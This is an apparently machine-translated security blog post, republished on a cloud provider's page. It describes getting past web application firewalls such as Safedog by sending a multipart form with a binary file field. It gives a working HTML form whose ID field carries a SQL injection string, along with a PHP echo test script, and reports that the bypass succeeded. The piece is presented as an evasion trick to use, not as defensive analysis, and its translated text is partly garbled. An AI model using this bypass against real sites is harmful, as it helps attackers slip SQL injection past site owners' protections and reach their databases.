Easy post injection and cross-site defense (such as safedog) around various WAF)

Source: Internet
Author: User

XXX has previously submitted multipart requests to bypass various WAF Methods: One of the defects of WAF 360 website, quickshield, jiasule and other similar products, which does not seem to attract much attention. Today, I found that the dongle was so intelligent that he didn't want to eat it. But I submitted a binary file domain to the dongle and it was xxoo. Be sure to use binary files, images, compressed packages, or anything.

Construct the following HTML form:

<! Doctype HTML>
<HTML>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> yzmm-p2j.cn </title>
</Head>
<Body>
<Form action = "http://webshell.cc/index.php" method = "Post" enctype = "multipart/form-Data">
File: <input type = "file" name = "file"/> <br/>
ID: <input type = "text" name = "ID" value = "select 1 from mysql. User --" style = "width: 250px;"/> <br/>
<Input type = "Submit" value = "Submit"/>
</Form>
</Body>
</Html>

Index. php:

 

<?php
echo "POST-ID:".$_POST[‘id‘]."<br/>GET-ID:".$_GET[‘id‘];
?>

Submit a request with a binary file:

Bypass successfully.

 

 

The content on this site is original. For reprinted content, be sure to keep your signatures and links!
Easy to wrap around a variety of WAF post injection, cross-site defense (such as safe dog): http://www.webshell.cc/4464.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.